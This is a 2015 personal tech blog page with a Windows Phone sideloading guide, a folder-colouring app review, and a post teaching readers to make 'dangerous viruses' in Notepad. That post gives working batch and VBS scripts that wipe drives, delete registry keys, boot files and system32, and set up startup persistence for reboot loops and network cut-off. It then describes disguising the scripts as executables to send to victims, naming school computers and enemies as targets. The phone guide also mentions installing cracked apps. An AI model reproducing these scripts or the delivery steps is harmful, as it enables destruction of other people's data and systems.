­­­Nav's Blog­­­

Friday, April 17, 2015

[Guide] [Jailbreak WP] How to Unlock your Windows Phone

logowindowsphone8_r1_c1_0_0

  • Let’s take a look at how to side load windows phone apps to your windows phone 8 or 8.1 device that aren’t from WP store (cracked apps or apps that developed by you). Basically you need to have some tools. Let’s start without long introduction.
    First you need to download Windows Phone 8 SDK.
    • Then open, Windows Phone Developer Registration Tool.
    • Now connect your WP device with USB cable and unlock the phone.
    • Before start, make sure your phone’s date and time is accurate. If not you won’t be able to register.
    You can see Windows Phone Developer Registration Tool as shown below.
    Screenshot (16)
    • Now wait till the Status changes to “Identified Windows Phone 8 device. Click the Register button to unlock the phone“. If your device already Registered you’ll see Unregister instead of register button.
    • Now you can click Register button.
    • Then Sign In dialog box will appear. Insert your Microsoft account mail address and password. click Sign In.
    • After your phone registered status changes to “Congratulations! You have successfully unlocked your Windows Phone“.
    Now you are ready to deploy non-store apps to your WP.



[Guide] How To Change Folder Color !

folder-colorizer-01-535x535

  • Folder Colorizer is a small Windows application created to assign a different color to any folder on your system.

    Basic technical knowledge is enough because Folder Colorizer introduces an entry in the Context Menu and thus allows you to simply right click a folder to change its color.
    The application already comes with eight predefined colors, but it also allows you to define your very own and even save it by writing down an unique name.
    It’s all just a matter of clicks and while this could be very well considered just a task more appropriate for rookies, it could come in handy to every computer user out there.
    The application doesn’t affect system performance in any way and the best of all is that it works smoothly on all Windows versions on the market. What’s more, it only asks for administrator privileges in order to change the color of system-protected folders.
    Last but not least, you don’t even need to let the app running in order to keep the new folder colors, so computer performance isn’t affected at all.
    All things considered, Folder Colorizer is an app that could help plenty of users out there, offering one of the most user-friendly approaches on the market. Shell integration clearly helps a lot and since it’s all so intuitive, the lack of a help manual shouldn’t bother you too much.

    1)Download The Latest Version Of Software From The Given Links
    2)Install The Software
    3)Right Click On Folder(which you want to customize) & Then

    color-context
    folder-colorizer-356x600
    Download Links

[Guide] Make Some Useful & Dangerous Viruses In Notepad!

  • Create Your Own Viruses
    Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers :D . Let’s get started.
    How to make a virus ?
    1. Open Notepad
    2. Put The Codes Provided
    3. Save it in the correct extension
    4. Done
    • Wiper [Not Official Name But I call It]
    Deletes everything in the computer’s drive


    @echo off
    del D:\*.* /f /s /q
    del E:\*.* /f /s /q
    del F:\*.* /f /s /q
    del G:\*.* /f /s /q
    del H:\*.* /f /s /q
    del I:\*.* /f /s /q
    del J:\*.* /f /s /q
    Save As “Your File Name.bat [Batch File]
    • Registry Deleter
    Deletes everything stored in registry
    @echo OFF
    START reg delete HKCR/.exe
    START reg delete HKCR/.dll
    START reg delete HKCR/*
    • No Access
    A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD
    @echo off
    Ipconfig /release
    • Shut Up
    Send your friend a little message and shut down his computer
    @echo off
    msg * Lets Roll Baby
    shutdown -c “Error! Your ass got glued!” -s
    • Crash Puter
    This is simple virus that crashes the computer – [Save As Anything.VBS]
    Option Explicit
    Dim WSHShell
    Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
    Dim x
    For x = 1 to 100000000
    WSHShell.Run “Tourstart.exe”
    Next
    • Ez Formatter
    This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.
    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\
    • Shutter
    This virus can be very annoying it shutdowns computer every time the computer is turned on.
    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11 -f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
    echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
    PAUSE
    Now its time for few very dangerous viruses
    • Rest In Peace
    It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself .
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini
    • Century
    Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice.
    Create a new shortcut and type :-
    shutdown -s -t 100 c “Installing Updates”
    • RIP -2
    This virus does the same It also prevents pc from starting but in an effective and better way.
    del c:\WINDOWS\system32\*.*/q
    • Freak
    This virus disables the internet forever
    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo You have maxed your internet usage for a lifetime :D
    PAUSE

    Now there are some smart guys who check the batch files in notepad before running it. No big deal. An effective way .
    How to make those stuff work ?
    1. Download and run the converter.
    2. Inject your batch file
    3. Choose Icon
    4. Version and information
    5. Compile
    6. Send to your victim
    7. Enjoy :)

[EXCLUSIVE] [GUIDE] How To Hack and Bypass Windows Login !